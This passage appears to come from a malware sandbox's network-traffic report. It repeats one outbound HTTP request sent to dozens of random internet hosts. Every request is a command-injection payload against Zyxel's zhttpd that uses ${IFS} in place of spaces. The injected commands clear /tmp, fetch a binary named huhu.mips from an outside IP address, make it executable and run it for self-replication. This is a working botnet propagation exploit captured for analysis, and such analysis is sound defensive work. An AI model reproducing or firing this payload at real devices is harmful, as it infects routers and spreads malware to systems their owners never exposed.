                                                  Jan 19, 2024 18:23:40.739197969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  811192.168.2.1354532211.182.228.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739231110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  812192.168.2.1357012109.181.95.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739254951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  813192.168.2.1360134109.109.0.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739312887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  814192.168.2.1356308144.239.185.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739351988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  815192.168.2.135812462.226.59.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739413977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  816192.168.2.1358858146.133.219.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739453077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  817192.168.2.135998868.115.21.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739490032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  818192.168.2.1356574134.225.161.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739531994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  819192.168.2.1335688220.24.237.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739574909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  820192.168.2.1341412207.200.85.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739599943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  821192.168.2.1348718124.122.238.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739646912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  822192.168.2.1336970116.219.188.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739670038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  823192.168.2.135199066.17.220.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739733934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  824192.168.2.1338996187.77.141.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739774942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  825192.168.2.1345518161.139.13.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739808083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  826192.168.2.1337446162.231.92.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739842892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  827192.168.2.134101485.140.146.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739875078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  828192.168.2.1354412167.23.33.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739907980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  829192.168.2.1358704197.215.49.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739958048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  830192.168.2.133992823.203.178.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739979982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  831192.168.2.1356860111.140.67.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.740034103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  832192.168.2.133769217.234.82.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.740077972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  833192.168.2.1334642104.216.66.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.763010025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  834192.168.2.135759051.40.21.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.763046026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  835192.168.2.134929645.52.148.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.763082027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  836192.168.2.1336326120.8.180.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.763117075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  837192.168.2.135554288.99.5.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.763154984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  838192.168.2.1351516108.104.242.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.763283014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  839192.168.2.135612486.74.206.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.763283014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  840192.168.2.1358388189.187.148.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.763324022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  841192.168.2.135595634.112.102.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.767182112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  842192.168.2.1353364122.34.101.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.767205000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  843192.168.2.1338444200.102.100.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.767242908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  844192.168.2.1340612153.219.217.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.767273903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  845192.168.2.135327042.213.87.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.767294884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  846192.168.2.135341812.63.86.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.767357111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  847192.168.2.135173494.1.98.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.767405033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  848192.168.2.133970448.76.22.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.767438889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  849192.168.2.1350858108.53.40.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.767504930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  850192.168.2.13379425.146.220.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.750164032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  851192.168.2.134330636.30.184.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.750303030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  852192.168.2.1354350205.107.194.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.750333071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  853192.168.2.1360798110.8.116.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.750379086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  854192.168.2.1348230162.103.188.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.750442982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  855192.168.2.134382680.83.248.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.750444889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  856192.168.2.1359726189.237.8.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.750511885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  857192.168.2.135267265.95.26.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.750538111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  858192.168.2.133782620.204.43.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.750572920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  859192.168.2.1341890153.103.112.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.750612020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  860192.168.2.13466625.185.74.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.750643969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  861192.168.2.1359828159.209.11.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.750683069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  862192.168.2.1349686216.245.85.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.750721931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  863192.168.2.1338788137.242.202.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.750761032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  864192.168.2.134564285.101.162.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.750801086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  865192.168.2.1356288200.137.48.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751084089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  866192.168.2.134847299.194.42.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751117945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  867192.168.2.135767073.247.42.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751168013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  868192.168.2.1334974155.40.125.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751220942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  869192.168.2.133849620.96.226.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751233101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  870192.168.2.134970260.184.64.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751275063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  871192.168.2.133717489.65.97.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751317024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  872192.168.2.134807882.90.136.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751368999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  873192.168.2.135333844.96.161.54443
                                                  TimestampBytes transferredDirectionData
